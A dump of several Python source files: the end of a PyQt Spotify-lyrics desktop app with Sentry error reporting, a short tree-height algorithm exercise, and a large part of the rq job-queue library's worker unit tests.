(self.song.name, self.song.artist))
save_dialog.setInformativeText("Do you want overwrite them?")
save_dialog.setWindowTitle("Lyrics already saved")
save_dialog.setStandardButtons(QMessageBox.Yes | QMessageBox.No)
save_anyway = save_dialog.exec()
if save_anyway == QMessageBox.Yes:
new_lyrics_file_name = file_parts[0]
break
else:
return
if not new_lyrics_file_name:
new_lyrics_file_name = os.path.join(Config.LYRICS_DIR, f"{artist} - {name}")
text = self.lyrics
if self.timed:
lyrics_file_name = new_lyrics_file_name + ".lrc"
if self.sync_adjustment_slider.value() != 0:
lrc = pylrc.parse(text)
lrc.offset -= self.sync_adjustment_slider.value() * 1000
text = lrc.toLRC()
else:
lyrics_file_name = new_lyrics_file_name + ".txt"
with open(lyrics_file_name, "w", encoding="utf-8") as lyrics_file:
lyrics_file.write(text)
def spotify(self) -> None:
if not self.open_spotify:
return
if not backend.open_spotify(self.get_current_streaming_service()):
save_dialog = QMessageBox()
save_dialog.setWindowIcon(FORM.windowIcon())
save_dialog.setIcon(QMessageBox.Warning)
save_dialog.setText("Couldn't open %s!" % str(self.get_current_streaming_service()))
save_dialog.setStandardButtons(QMessageBox.Ok)
save_dialog.exec()
@classmethod
def dict_to_style(cls, dictionary: dict) -> str:
style = ""
for key, value in dictionary.items():
style = f"{style}{key}: {value};"
return style
class FormWidget(QtWidgets.QWidget):
def __init__(self):
super().__init__()
def closeEvent(self, event):
UI.load_save_settings(save=True)
if UI.minimize_to_tray:
event.ignore()
self.hide()
def icon_activated(self, reason):
if reason == QtWidgets.QSystemTrayIcon.DoubleClick:
self.show()
def moveEvent(self, a0: QtGui.QMoveEvent) -> None:
try:
UI.load_save_settings(save=True)
except:
pass
def resizeEvent(self, a0: QtGui.QResizeEvent) -> None:
try:
UI.load_save_settings(save=True)
except:
pass
if __name__ == "__main__":
sentry_sdk.init("https://71bf000cb7c5448c8c08660b29a12c09@o407859.ingest.sentry.io/5277612",
release=f"spotifylyrics@{backend.get_version()}", auto_enabling_integrations=False)
with sentry_sdk.configure_scope() as scope:
try:
scope.set_user({"username": getpass.getuser()})
except ModuleNotFoundError:
pass
if getattr(sys, 'frozen', False) and hasattr(sys, '_MEIPASS'):
running = "pyinstaller"
else:
running = "source"
scope.set_tag("running_from", running)
scope.set_tag("os", platform.system())
scope.set_tag("os_version", platform.release())
scope.set_tag("architecture", platform.machine())
APP = QtWidgets.QApplication(sys.argv)
APP.setStyle("fusion")
FORM = FormWidget()
UI = UiForm()
FORM.show()
sys.exit(APP.exec())
|
tree-height.py | # python3
import sys, threading
sys.setrecursionlimit(10**7) # max depth of recursion
threading.stack_size(2**27) # new thread will get stack of such size
class TreeHeight:
def read(self):
self.n = int(sys.stdin.readline())
self.parent = list(map(int, sys.stdin.readline().split()))
tree = dict()
for vertex in range(-1, self.n):
tree[vertex] = []
for vertex in range(self.n):
tree[self.parent[vertex]].append(vertex)
return tree
def compute_height(tree, v = -1):
if not tree[v]:
return 0
max = 0
for child in tree[v]:
height = compute_height(tree, child)
if height > max:
max = height
return 1 + max
def main():
treeheight = TreeHeight()
tree = treeheight.read()
print(compute_height(tree))
#print(tree)
threading.Thread(target=main).start()
|
test_worker.py | # -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import json
import os
import psutil
import shutil
import signal
import subprocess
import sys
import time
import zlib
from datetime import datetime, timedelta, timezone
from multiprocessing import Process
from time import sleep
from unittest import skipIf
import redis.exceptions
import pytest
import mock
from mock import Mock
from tests import RQTestCase, slow
from tests.fixtures import (
access_self, create_file, create_file_after_timeout, create_file_after_timeout_and_setsid, div_by_zero, do_nothing,
kill_worker, long_running_job, modify_self, modify_self_and_error,
run_dummy_heroku_worker, save_key_ttl, say_hello, say_pid, raise_exc_mock,
launch_process_within_worker_and_store_pid
)
from rq import Queue, SimpleWorker, Worker, get_current_connection
from rq.compat import as_text, PY2
from rq.job import Job, JobStatus, Retry
from rq.registry import StartedJobRegistry, FailedJobRegistry, FinishedJobRegistry
from rq.suspension import resume, suspend
from rq.utils import utcnow
from rq.version import VERSION
from rq.worker import HerokuWorker, WorkerStatus, RoundRobinWorker, RandomWorker
from rq.serializers import JSONSerializer
class CustomJob(Job):
pass
class CustomQueue(Queue):
pass
class TestWorker(RQTestCase):
def test_create_worker(self):
"""Worker creation using various inputs."""
# With single string argument
w = Worker('foo')
self.assertEqual(w.queues[0].name, 'foo')
# With list of strings
w = Worker(['foo', 'bar'])
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
self.assertEqual(w.queue_keys(), [w.queues[0].key, w.queues[1].key])
self.assertEqual(w.queue_names(), ['foo', 'bar'])
# With iterable of strings
w = Worker(iter(['foo', 'bar']))
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# Also accept byte strings in Python 2
if PY2:
# With single byte string argument
w = Worker(b'foo')
self.assertEqual(w.queues[0].name, 'foo')
# With list of byte strings
w = Worker([b'foo', b'bar'])
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# With iterable of byte strings
w = Worker(iter([b'foo', b'bar']))
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# With single Queue
w = Worker(Queue('foo'))
self.assertEqual(w.queues[0].name, 'foo')
# With iterable of Queues
w = Worker(iter([Queue('foo'), Queue('bar')]))
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# With list of Queues
w = Worker([Queue('foo'), Queue('bar')])
self.assertEqual(w.queues[0].name, 'foo')
self.assertEqual(w.queues[1].name, 'bar')
# With string and serializer
w = Worker('foo', serializer=json)
self.assertEqual(w.queues[0].name, 'foo')
# With queue having serializer
w = Worker(Queue('foo'), serializer=json)
self.assertEqual(w.queues[0].name, 'foo')
def test_work_and_quit(self):
"""Worker processes work, then quits."""
fooq, barq = Queue('foo'), Queue('bar')
w = Worker([fooq, barq])
self.assertEqual(
w.work(burst=True), False,
'Did not expect any work on the queue.'
)
fooq.enqueue(say_hello, name='Frank')
self.assertEqual(
w.work(burst=True), True,
'Expected at least some work done.'
)
def test_work_and_quit_custom_serializer(self):
"""Worker processes work, then quits."""
fooq, barq = Queue('foo', serializer=JSONSerializer), Queue('bar', serializer=JSONSerializer)
w = Worker([fooq, barq], serializer=JSONSerializer)
self.assertEqual(
w.work(burst=True), False,
'Did not expect any work on the queue.'
)
fooq.enqueue(say_hello, name='Frank')
self.assertEqual(
w.work(burst=True), True,
'Expected at least some work done.'
)
def test_worker_all(self):
"""Worker.all() works properly"""
foo_queue = Queue('foo')
bar_queue = Queue('bar')
w1 = Worker([foo_queue, bar_queue], name='w1')
w1.register_birth()
w2 = Worker([foo_queue], name='w2')
w2.register_birth()
self.assertEqual(
set(Worker.all(connection=foo_queue.connection)),
set([w1, w2])
)
self.assertEqual(set(Worker.all(queue=foo_queue)), set([w1, w2]))
self.assertEqual(set(Worker.all(queue=bar_queue)), set([w1]))
w1.register_death()
w2.register_death()
def test_find_by_key(self):
"""Worker.find_by_key restores queues, state and job_id."""
queues = [Queue('foo'), Queue('bar')]
w = Worker(queues)
w.register_death()
w.register_birth()
w.set_state(WorkerStatus.STARTED)
worker = Worker.find_by_key(w.key)
self.assertEqual(worker.queues, queues)
self.assertEqual(worker.get_state(), WorkerStatus.STARTED)
self.assertEqual(worker._job_id, None)
self.assertTrue(worker.key in Worker.all_keys(worker.connection))
self.assertEqual(worker.version, VERSION)
# If worker is gone, its keys should also be removed
worker.connection.delete(worker.key)
Worker.find_by_key(worker.key)
self.assertFalse(worker.key in Worker.all_keys(worker.connection))
self.assertRaises(ValueError, Worker.find_by_key, 'foo')
def test_worker_ttl(self):
"""Worker ttl."""
w = Worker([])
w.register_birth()
[worker_key] = self.testconn.smembers(Worker.redis_workers_keys)
self.assertIsNotNone(self.testconn.ttl(worker_key))
w.register_death()
def test_work_via_string_argument(self):
"""Worker processes work fed via string arguments."""
q = Queue('foo')
w = Worker([q])
job = q.enqueue('tests.fixtures.say_hello', name='Frank')
self.assertEqual(
w.work(burst=True), True,
'Expected at least some work done.'
)
self.assertEqual(job.result, 'Hi there, Frank!')
self.assertIsNone(job.worker_name)
def test_job_times(self):
"""job times are set correctly."""
q = Queue('foo')
w = Worker([q])
before = utcnow()
before = before.replace(microsecond=0)
job = q.enqueue(say_hello)
self.assertIsNotNone(job.enqueued_at)
self.assertIsNone(job.started_at)
self.assertIsNone(job.ended_at)
self.assertEqual(
w.work(burst=True), True,
'Expected at least some work done.'
)
self.assertEqual(job.result, 'Hi there, Stranger!')
after = utcnow()
job.refresh()
self.assertTrue(
before <= job.enqueued_at <= after,
'Not %s <= %s <= %s' % (before, job.enqueued_at, after)
)
self.assertTrue(
before <= job.started_at <= after,
'Not %s <= %s <= %s' % (before, job.started_at, after)
)
self.assertTrue(
before <= job.ended_at <= after,
'Not %s <= %s <= %s' % (before, job.ended_at, after)
)
def test_work_is_unreadable(self):
"""Unreadable jobs are put on the failed job registry."""
q = Queue()
self.assertEqual(q.count, 0)
# NOTE: We have to fake this enqueueing for this test case.
# What we're simulating here is a call to a function that is not
# importable from the worker process.
job = Job.create(func=div_by_zero, args=(3,), origin=q.name)
job.save()
job_data = job.data
invalid_data = job_data.replace(b'div_by_zero', b'nonexisting')
assert job_data != invalid_data
self.testconn.hset(job.key, 'data', zlib.compress(invalid_data))
# We use the low-level internal function to enqueue any data (bypassing
# validity checks)
q.push_job_id(job.id)
self.assertEqual(q.count, 1)
# All set, we're going to process it
w = Worker([q])
w.work(burst=True) # should silently pass
self.assertEqual(q.count, 0)
failed_job_registry = FailedJobRegistry(queue=q)
self.assertTrue(job in failed_job_registry)
def test_heartbeat(self):
"""Heartbeat saves last_heartbeat"""
q = Queue()
w = Worker([q])
w.register_birth()
self.assertEqual(str(w.pid), as_text(self.testconn.hget(w.key, 'pid')))
self.assertEqual(w.hostname,
as_text(self.testconn.hget(w.key, 'hostname')))
last_heartbeat = self.testconn.hget(w.key, 'last_heartbeat')
self.assertIsNotNone(self.testconn.hget(w.key, 'birth'))
self.assertTrue(last_heartbeat is not None)
w = Worker.find_by_key(w.key)
self.assertIsInstance(w.last_heartbeat, datetime)
# worker.refresh() shouldn't fail if last_heartbeat is None
# for compatibility reasons
self.testconn.hdel(w.key, 'last_heartbeat')
w.refresh()
# worker.refresh() shouldn't fail if birth is None
# for compatibility reasons
self.testconn.hdel(w.key, 'birth')
w.refresh()
@slow
def test_heartbeat_survives_lost_connection(self):
with mock.patch.object(Worker, 'heartbeat') as mocked:
# None -> Heartbeat is first called before the job loop
mocked.side_effect = [None, redis.exceptions.ConnectionError()]
q = Queue()
w = Worker([q])
w.work(burst=True)
# First call is prior to job loop, second raises the error,
# third is successful, after "recovery"
assert mocked.call_count == 3
@slow
def test_heartbeat_busy(self):
"""Periodic heartbeats while horse is busy with long jobs"""
q = Queue()
w = Worker([q], job_monitoring_interval=5)
for timeout, expected_heartbeats in [(2, 0), (7, 1), (12, 2)]:
job = q.enqueue(long_running_job,
args=(timeout,),
job_timeout=30,
result_ttl=-1)
with mock.patch.object(w, 'heartbeat', wraps=w.heartbeat) as mocked:
w.execute_job(job, q)
self.assertEqual(mocked.call_count, expected_heartbeats)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
def test_work_fails(self):
"""Failing jobs are put on the failed queue."""
q = Queue()
self.assertEqual(q.count, 0)
# Action
job = q.enqueue(div_by_zero)
self.assertEqual(q.count, 1)
# keep for later
enqueued_at_date = str(job.enqueued_at)
w = Worker([q])
w.work(burst=True)
# Postconditions
self.assertEqual(q.count, 0)
failed_job_registry = FailedJobRegistry(queue=q)
self.assertTrue(job in failed_job_registry)
self.assertEqual(w.get_current_job_id(), None)
# Check the job
job = Job.fetch(job.id)
self.assertEqual(job.origin, q.name)
self.assertIsNone(job.worker_name) # Worker name is cleared after failures
# Should be the original enqueued_at date, not the date of enqueueing
# to the failed queue
self.assertEqual(str(job.enqueued_at), enqueued_at_date)
self.assertTrue(job.exc_info) # should contain exc_info
def test_horse_fails(self):
"""Tests that job status is set to FAILED even if horse unexpectedly fails"""
q = Queue()
self.assertEqual(q.count, 0)
# Action
job = q.enqueue(say_hello)
self.assertEqual(q.count, 1)
# keep for later
enqueued_at_date = str(job.enqueued_at)
w = Worker([q])
with mock.patch.object(w, 'perform_job', new_callable=raise_exc_mock):
w.work(burst=True) # should silently pass
# Postconditions
self.assertEqual(q.count, 0)
failed_job_registry = FailedJobRegistry(queue=q)
self.assertTrue(job in failed_job_registry)
self.assertEqual(w.get_current_job_id(), None)
# Check the job
job = Job.fetch(job.id)
self.assertEqual(job.origin, q.name)
# Should be the original enqueued_at date, not the date of enqueueing
# to the failed queue
self.assertEqual(str(job.enqueued_at), enqueued_at_date)
self.assertTrue(job.exc_info) # should contain exc_info
def test_statistics(self):
"""Successful and failed job counts are saved properly"""
queue = Queue()
job = queue.enqueue(div_by_zero)
worker = Worker([queue])
worker.register_birth()
self.assertEqual(worker.failed_job_count, 0)
self.assertEqual(worker.successful_job_count, 0)
self.assertEqual(worker.total_working_time, 0)
registry = StartedJobRegistry(connection=worker.connection)
job.started_at = utcnow()
job.ended_at = job.started_at + timedelta(seconds=0.75)
worker.handle_job_failure(job, queue)
worker.handle_job_success(job, queue, registry)
worker.refresh()
self.assertEqual(worker.failed_job_count, 1)
self.assertEqual(worker.successful_job_count, 1)
self.assertEqual(worker.total_working_time, 1.5) # 1.5 seconds
worker.handle_job_failure(job, queue)
worker.handle_job_success(job, queue, registry)
worker.refresh()
self.assertEqual(worker.failed_job_count, 2)
self.assertEqual(worker.successful_job_count, 2)
self.assertEqual(worker.total_working_time, 3.0)
def test_handle_retry(self):
"""handle_job_failure() handles retry properly"""
connection = self.testconn
queue = Queue(connection=connection)
retry = Retry(max=2)
job = queue.enqueue(div_by_zero, retry=retry)
registry = FailedJobRegistry(queue=queue)
worker = Worker([queue])
# If job if configured to retry, it will be put back in the queue
# and not put in the FailedJobRegistry.
# This is the original execution
queue.empty()
worker.handle_job_failure(job, queue)
job.refresh()
self.assertEqual(job.retries_left, 1)
self.assertEqual([job.id], queue.job_ids)
self.assertFalse(job in registry)
# First retry
queue.empty()
worker.handle_job_failure(job, queue)
job.refresh()
self.assertEqual(job.retries_left, 0)
self.assertEqual([job.id], queue.job_ids)
# Second retry
queue.empty()
worker.handle_job_failure(job, queue)
job.refresh()
self.assertEqual(job.retries_left, 0)
self.assertEqual([], queue.job_ids)
# If a job is no longer retries, it's put in FailedJobRegistry
self.assertTrue(job in registry)
def test_retry_interval(self):
"""Retries with intervals are scheduled"""
connection = self.testconn
queue = Queue(connection=connection)
retry = Retry(max=1, interval=5)
job = queue.enqueue(div_by_zero, retry=retry)
worker = Worker([queue])
registry = queue.scheduled_job_registry
# If job if configured to retry with interval, it will be scheduled,
# not directly put back in the queue
queue.empty()
worker.handle_job_failure(job, queue)
job.refresh()
self.assertEqual(job.get_status(), JobStatus.SCHEDULED)
self.assertEqual(job.retries_left, 0)
self.assertEqual(len(registry), 1)
self.assertEqual(queue.job_ids, [])
# Scheduled time is roughly 5 seconds from now
scheduled_time = registry.get_scheduled_time(job)
now = datetime.now(timezone.utc)
self.assertTrue(now + timedelta(seconds=4) < scheduled_time < now + timedelta(seconds=6))
def test_total_working_time(self):
"""worker.total_working_time is stored properly"""
queue = Queue()
job = queue.enqueue(long_running_job, 0.05)
worker = Worker([queue])
worker.register_birth()
worker.perform_job(job, queue)
worker.refresh()
# total_working_time should be a little bit more than 0.05 seconds
self.assertGreaterEqual(worker.total_working_time, 0.05)
# in multi-user environments delays might be unpredictable,
# please adjust this magic limit accordingly in case if It takes even longer to run
self.assertLess(worker.total_working_time, 1)
def test_max_jobs(self):
"""Worker exits after number of jobs complete."""
queue = Queue()
job1 = queue.enqueue(do_nothing)
job2 = queue.enqueue(do_nothing)
worker = Worker([queue])
worker.work(max_jobs=1)
self.assertEqual(JobStatus.FINISHED, job1.get_status())
self.assertEqual(JobStatus.QUEUED, job2.get_status())
def test_disable_default_exception_handler(self):
"""
Job is not moved to FailedJobRegistry when default custom exception
handler is disabled.
"""
queue = Queue(name='default', connection=self.testconn)
job = queue.enqueue(div_by_zero)
worker = Worker([queue], disable_default_exception_handler=False)
worker.work(burst=True)
registry = FailedJobRegistry(queue=queue)
self.assertTrue(job in registry)
# Job is not added to FailedJobRegistry if
# disable_default_exception_handler is True
job = queue.enqueue(div_by_zero)
worker = Worker([queue], disable_default_exception_handler=True)
worker.work(burst=True)
self.assertFalse(job in registry)
def test_custom_exc_handling(self):
"""Custom exception handling."""
def first_handler(job, *exc_info):
job.meta = {'first_handler': True}
job.save_meta()
return True
def second_handler(job, *exc_info):
job.meta.update({'second_handler': True})
job.save_meta()
def black_hole(job, *exc_info):
# Don't fall through to default behaviour (moving to failed queue)
return False
q = Queue()
self.assertEqual(q.count, 0)
job = q.enqueue(div_by_zero)
w = Worker([q], exception_handlers=first_handler)
w.work(burst=True)
# Check the job
job.refresh()
self.assertEqual(job.is_failed, True)
self.assertTrue(job.meta['first_handler'])
job = q.enqueue(div_by_zero)
w = Worker([q], exception_handlers=[first_handler, second_handler])
w.work(burst=True)
# Both custom exception handlers are run
job.refresh()
self.assertEqual(job.is_failed, True)
self.assertTrue(job.meta['first_handler'])
self.assertTrue(job.meta['second_handler'])
job = q.enqueue(div_by_zero)
w = Worker([q], exception_handlers=[first_handler, black_hole,
second_handler])
w.work(burst=True)
# second_handler is not run since it's interrupted by black_hole
job.refresh()
self.assertEqual(job.is_failed, True)
self.assertTrue(job.meta['first_handler'])
self.assertEqual(job.meta.get('second_handler'), None)
def test_cancelled_jobs_arent_executed(self):
"""Cancelling jobs."""
SENTINEL_FILE = '/tmp/rq-tests.txt' # noqa
try:
# Remove the sentinel if it is leftover from a previous test run
os.remove(SENTINEL_FILE)
except OSError as e:
if e.errno != 2:
raise
q = Queue()
job = q.enqueue(create_file, SENTINEL_FILE)
# Here, we cancel the job, so the sentinel file may not be created
self.testconn.delete(job.key)
w = Worker([q])
w.work(burst=True)
assert q.count == 0
# Should not have created evidence of execution
self.assertEqual(os.path.exists(SENTINEL_FILE), False)
@slow # noqa
def test_timeouts(self):
"""Worker kills jobs after timeout."""
sentinel_file = '/tmp/.rq_sentinel'
q = Queue()
w = Worker([q])
# Put it on the queue with a timeout value
res = q.enqueue(create_file_after_timeout,
args=(sentinel_file, 4),
job_timeout=1)
try:
os.unlink(sentinel_file)
except OSError as e:
if e.errno == 2:
pass
self.assertEqual(os.path.exists(sentinel_file), False)
w.work(burst=True)
self.assertEqual(os.path.exists(sentinel_file), False)
# TODO: Having to do the manual refresh() here is really ugly!
res.refresh()
self.assertIn('JobTimeoutException', as_text(res.exc_info))
def test_worker_sets_result_ttl(self):
"""Ensure that Worker properly sets result_ttl for individual jobs."""
q = Queue()
job = q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w = Worker([q])
self.assertIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1))
w.work(burst=True)
self.assertNotEqual(self.testconn.ttl(job.key), 0)
self.assertNotIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1))
# Job with -1 result_ttl don't expire
job = q.enqueue(say_hello, args=('Frank',), result_ttl=-1)
w = Worker([q])
self.assertIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1))
w.work(burst=True)
self.assertEqual(self.testconn.ttl(job.key), -1)
self.assertNotIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1))
# Job with result_ttl = 0 gets deleted immediately
job = q.enqueue(say_hello, args=('Frank',), result_ttl=0)
w = Worker([q])
self.assertIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1))
w.work(burst=True)
self.assertEqual(self.testconn.get(job.key), None)
self.assertNotIn(job.get_id().encode(), self.testconn.lrange(q.key, 0, -1))
def test_worker_sets_job_status(self):
"""Ensure that worker correctly sets job status."""
q = Queue()
w = Worker([q])
job = q.enqueue(say_hello)
self.assertEqual(job.get_status(), JobStatus.QUEUED)
self.assertEqual(job.is_queued, True)
self.assertEqual(job.is_finished, False)
self.assertEqual(job.is_failed, False)
w.work(burst=True)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
self.assertEqual(job.is_queued, False)
self.assertEqual(job.is_finished, True)
self.assertEqual(job.is_failed, False)
# Failed jobs should set status to "failed"
job = q.enqueue(div_by_zero, args=(1,))
w.work(burst=True)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FAILED)
self.assertEqual(job.is_queued, False)
self.assertEqual(job.is_finished, False)
self.assertEqual(job.is_failed, True)
def test_job_dependency(self):
"""Enqueue dependent jobs only if their parents don't fail"""
q = Queue()
w = Worker([q])
parent_job = q.enqueue(say_hello, result_ttl=0)
job = q.enqueue_call(say_hello, depends_on=parent_job)
w.work(burst=True)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
parent_job = q.enqueue(div_by_zero)
job = q.enqueue_call(say_hello, depends_on=parent_job)
w.work(burst=True)
job = Job.fetch(job.id)
self.assertNotEqual(job.get_status(), JobStatus.FINISHED)
def test_get_current_job(self):
"""Ensure worker.get_current_job() works properly"""
q = Queue()
worker = Worker([q])
job = q.enqueue_call(say_hello)
self.assertEqual(self.testconn.hget(worker.key, 'current_job'), None)
worker.set_current_job_id(job.id)
self.assertEqual(
worker.get_current_job_id(),
as_text(self.testconn.hget(worker.key, 'current_job'))
)
self.assertEqual(worker.get_current_job(), job)
def test_custom_job_class(self):
"""Ensure Worker accepts custom job class."""
q = Queue()
worker = Worker([q], job_class=CustomJob)
self.assertEqual(worker.job_class, CustomJob)
def test_custom_queue_class(self):
"""Ensure Worker accepts custom queue class."""
q = CustomQueue()
worker = Worker([q], queue_class=CustomQueue)
self.assertEqual(worker.queue_class, CustomQueue)
def test_custom_queue_class_is_not_global(self):
"""Ensure Worker custom queue class is not global."""
q = CustomQueue()
worker_custom = Worker([q], queue_class=CustomQueue)
q_generic = Queue()
worker_generic = Worker([q_generic])
self.assertEqual(worker_custom.queue_class, CustomQueue)
self.assertEqual(worker_generic.queue_class, Queue)
self.assertEqual(Worker.queue_class, Queue)
def test_custom_job_class_is_not_global(self):
"""Ensure Worker custom job class is not global."""
q = Queue()
worker_custom = Worker([q], job_class=CustomJob)
q_generic = Queue()
worker_generic = Worker([q_generic])
self.assertEqual(worker_custom.job_class, CustomJob)
self.assertEqual(worker_generic.job_class, Job)
self.assertEqual(Worker.job_class, Job)
def test_work_via_simpleworker(self):
"""Worker processes work, with forking disabled,
then returns."""
fooq, barq = Queue('foo'), Queue('bar')
w = SimpleWorker([fooq, barq])
self.assertEqual(w.work(burst=True), False,
'Did not expect any work on the queue.')
job = fooq.enqueue(say_pid)
self.assertEqual(w.work(burst=True), True,
'Expected at least some work done.')
self.assertEqual(job.result, os.getpid(),
'PID mismatch, fork() is not supposed to happen here')
def test_simpleworker_heartbeat_ttl(self):
"""SimpleWorker's key must last longer than job.timeout when working"""
queue = Queue('foo')
worker = SimpleWorker([queue])
job_timeout = 300
job = queue.enqueue(save_key_ttl, worker.key, job_timeout=job_timeout)
worker.work(burst=True)
job.refresh()
self.assertGreater(job.meta['ttl'], job_timeout)
def test_prepare_job_execution(self):
"""Prepare job execution does the necessary bookkeeping."""
queue = Queue(connection=self.testconn)
job = queue.enqueue(say_hello)
worker = Worker([queue])
worker.prepare_job_execution(job)
# Updates working queue
registry = StartedJobRegistry(connection=self.testconn)
self.assertEqual(registry.get_job_ids(), [job.id])
# Updates worker statuses
self.assertEqual(worker.get_state(), 'busy')
self.assertEqual(worker.get_current_job_id(), job.id)
# job status is also updated
self.assertEqual(job._status, JobStatus.STARTED)
self.assertEqual(job.worker_name, worker.name)
def test_work_unicode_friendly(self):
"""Worker processes work with unicode description, then quits."""
q = Queue('foo')
w = Worker([q])
job = q.enqueue('tests.fixtures.say_hello', name='Adam',
description='ไฝ ๅฅฝ ไธ็!')
self.assertEqual(w.work(burst=True), True,
'Expected at least some work done.')
self.assertEqual(job.result, 'Hi there, Adam!')
self.assertEqual(job.description, 'ไฝ ๅฅฝ ไธ็!')
def test_work_log_unicode_friendly(self):
"""Worker process work with unicode or str other than pure ascii content,
logging work properly"""
q = Queue("foo")
w = Worker([q])
job = q.enqueue('tests.fixtures.say_hello', name='้ฟ่พพๅง',
description='ไฝ ๅฅฝ ไธ็!')
w.work(burst=True)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
job = q.enqueue('tests.fixtures.say_hello_unicode', name='้ฟ่พพๅง',
description='ไฝ ๅฅฝ ไธ็!')
w.work(burst=True)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
def test_suspend_worker_execution(self):
"""Test Pause Worker Execution"""
SENTINEL_FILE = '/tmp/rq-tests.txt' # noqa
try:
# Remove the sentinel if it is leftover from a previous test run
os.remove(SENTINEL_FILE)
except OSError as e:
if e.errno != 2:
raise
q = Queue()
q.enqueue(create_file, SENTINEL_FILE)
w = Worker([q])
suspend(self.testconn)
w.work(burst=True)
assert q.count == 1
# Should not have created evidence of execution
self.assertEqual(os.path.exists(SENTINEL_FILE), False)
resume(self.testconn)
w.work(burst=True)
assert q.count == 0
self.assertEqual(os.path.exists(SENTINEL_FILE), True)
@slow
def test_suspend_with_duration(self):
q = Queue()
for _ in range(5):
q.enqueue(do_nothing)
w = Worker([q])
# This suspends workers for working for 2 second
suspend(self.testconn, 2)
# So when this burst of work happens the queue should remain at 5
w.work(burst=True)
assert q.count == 5
sleep(3)
# The suspension should be expired now, and a burst of work should now clear the queue
w.work(burst=True)
assert q.count == 0
def test_worker_hash_(self):
"""Workers are hashed by their .name attribute"""
q = Queue('foo')
w1 = Worker([q], name="worker1")
w2 = Worker([q], name="worker2")
w3 = Worker([q], name="worker1")
worker_set = set([w1, w2, w3])
self.assertEqual(len(worker_set), 2)
def test_worker_sets_birth(self):
"""Ensure worker correctly sets worker birth date."""
q = Queue()
w = Worker([q])
w.register_birth()
birth_date = w.birth_date
self.assertIsNotNone(birth_date)
self.assertEqual(type(birth_date).__name__, 'datetime')
def test_worker_sets_death(self):
"""Ensure worker correctly sets worker death date."""
q = Queue()
w = Worker([q])
w.register_death()
death_date = w.death_date
self.assertIsNotNone(death_date)
self.assertIsInstance(death_date, datetime)
def test_clean_queue_registries(self):
"""worker.clean_registries sets last_cleaned_at and cleans registries."""
foo_queue = Queue('foo', connection=self.testconn)
foo_registry = StartedJobRegistry('foo', connection=self.testconn)
self.testconn.zadd(foo_registry.key, {'foo': 1})
self.assertEqual(self.testconn.zcard(foo_registry.key), 1)
bar_queue = Queue('bar', connection=self.testconn)
bar_registry = StartedJobRegistry('bar', connection=self.testconn)
self.testconn.zadd(bar_registry.key, {'bar': 1})
self.assertEqual(self.testconn.zcard(bar_registry.key), 1)
worker = Worker([foo_queue, bar_queue])
self.assertEqual(worker.last_cleaned_at, None)
worker.clean_registries()
self.assertNotEqual(worker.last_cleaned_at, None)
self.assertEqual(self.testconn.zcard(foo_registry.key), 0)
self.assertEqual(self.testconn.zcard(bar_registry.key), 0)
# worker.clean_registries() only runs once every 15 minutes
# If we add another key, calling clean_registries() should do nothing
self.testconn.zadd(bar_registry.key, {'bar': 1})
worker.clean_registries()
self.assertEqual(self.testconn.zcard(bar_registry.key), 1)
def test_should_run_maintenance_tasks(self):
"""Workers should run maintenance tasks on startup and every hour."""
queue = Queue(connection=self.testconn)
worker = Worker(queue)
self.assertTrue(worker.should_run_maintenance_tasks)
worker.last_cleaned_at = utcnow()
self.assertFalse(worker.should_run_maintenance_tasks)
worker.last_cleaned_at = utcnow() - timedelta(seconds=3700)
self.assertTrue(worker.should_run_maintenance_tasks)
def test_worker_calls_clean_registries(self):
"""Worker calls clean_registries when run."""
queue = Queue(connection=self.testconn)
registry = StartedJobRegistry(connection=self.testconn)
self.testconn.zadd(registry.key, {'foo': 1})
worker = Worker(queue, connection=self.testconn)
worker.work(burst=True)
self.assertEqual(self.testconn.zcard(registry.key), 0)
def test_job_dependency_race_condition(self):
"""Dependencies added while the job gets finished shouldn't get lost."""
# This patches the enqueue_dependents to enqueue a new dependency AFTER
# the original code was executed.
orig_enqueue_dependents = Queue.enqueue_dependents
def new_enqueue_dependents(self, job, *args, **kwargs):
orig_enqueue_dependents(self, job, *args, **kwargs)
if hasattr(Queue, '_add_enqueue') and Queue._add_enqueue is not None and Queue._add_enqueue.id == job.id:
Queue._add_enqueue = None
Queue().enqueue_call(say_hello, depends_on=job)
Queue.enqueue_dependents = new_enqueue_dependents
q = Queue()
w = Worker([q])
with mock.patch.object(Worker, 'execute_job', wraps=w.execute_job) as mocked:
parent_job = q.enqueue(say_hello, result_ttl=0)
Queue._add_enqueue = parent_job
job = q.enqueue_call(say_hello, depends_on=parent_job)
w.work(burst=True)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
# The created spy checks two issues:
# * before the fix of #739, 2 of the 3 jobs where executed due
# to the race condition
# * during the development another issue was fixed:
# due to a missing pipeline usage in Queue.enqueue_job, the job
# which was enqueued before the "rollback" was executed twice.
# So before that fix the call count was 4 instead of 3
self.assertEqual(mocked.call_count, 3)
def test_self_modification_persistence(self):
"""Make sure that any meta modification done by
the job itself persists completely through the
queue/worker/job stack."""
q = Queue()
# Also make sure that previously existing metadata
# persists properly
job = q.enqueue(modify_self, meta={'foo': 'bar', 'baz': 42},
args=[{'baz': 10, 'newinfo': 'waka'}])
w = Worker([q])
w.work(burst=True)
job_check = Job.fetch(job.id)
self.assertEqual(job_check.meta['foo'], 'bar')
self.assertEqual(job_check.meta['baz'], 10)
